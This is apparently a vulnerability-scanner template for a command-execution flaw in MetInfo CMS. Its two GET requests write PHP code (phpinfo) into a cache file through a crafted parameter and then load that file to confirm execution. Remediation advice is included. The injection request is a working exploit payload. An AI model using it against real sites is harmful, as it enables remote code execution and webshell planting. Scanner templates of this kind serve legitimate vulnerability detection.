id: Metinfo-Front-Getshell
info:
  name: MetInfo frontend GETSHELL
  author:
  - l0ne1y
  description: |-
    MetInfo frontend command execution GETSHELL vulnerability.
    MetInfo is an open-source, free CMS building system suitable for enterprise websites. The MetInfo enterprise website management system is mainly used to build enterprise websites and uses a PHP+Mysql architecture.

    In MetInfoCMS, the admin/include/common.inc.php page has a command execution vulnerability. An attacker can exploit it to obtain sensitive information.
  reference:
  - http://wooyun.org/bugs/wooyun-2015-094886
  severity: critical
  remediation: |-
    Official Fix:<br />1. Upgrade to a non-vulnerable version of the system, or download the security patch from the official site.
    https://www.mituo.cn/

    Temporary Fix:<br />1. Avoid executing external applications or commands whenever possible.<br />2. Use custom functions or function libraries to implement the functionality of external applications or commands.<br />3. Validate parameter content before executing functions that run commands, such as system and eval.<br />4. Use the escapeshellarg function to handle related parameters. escapeshellarg escapes any characters that could terminate arguments or commands. For example, a single quote is escaped, a double quote is escaped, and a semicolon (";") is escaped, restricting the parameter content within a pair of single or double quotes, escaping any single or double quotes it contains so they cannot truncate the current execution, thereby preventing command injection attacks.<br />5. Use safe_mode_exec_dir to specify the path for executable files. Set safe_mode in php.ini to On, place the allowed executable files in a directory, and use safe_mode_exec_dir to specify that executable file path. When an external program needs to run, it will only be allowed to execute if it is in the directory specified by safe_mode_exec_dir; otherwise execution will fail.
requests:
- matchers:
  - type: dsl
    dsl:
    - 'status_code_1==200 && contains(body_1,"System") && status_code_2==200 '
  matchers-condition: and
  path:
  - '{{BaseURL}}/admin/include/common.inc.php?met_admin_type_ok=1&langset=123&met_langadmin[123][]=12345&str=phpinfo%28%29%3B%3F%3E%2f%2f'
  - '{{BaseURL}}/cache/langadmin_123.php'
  method: GET
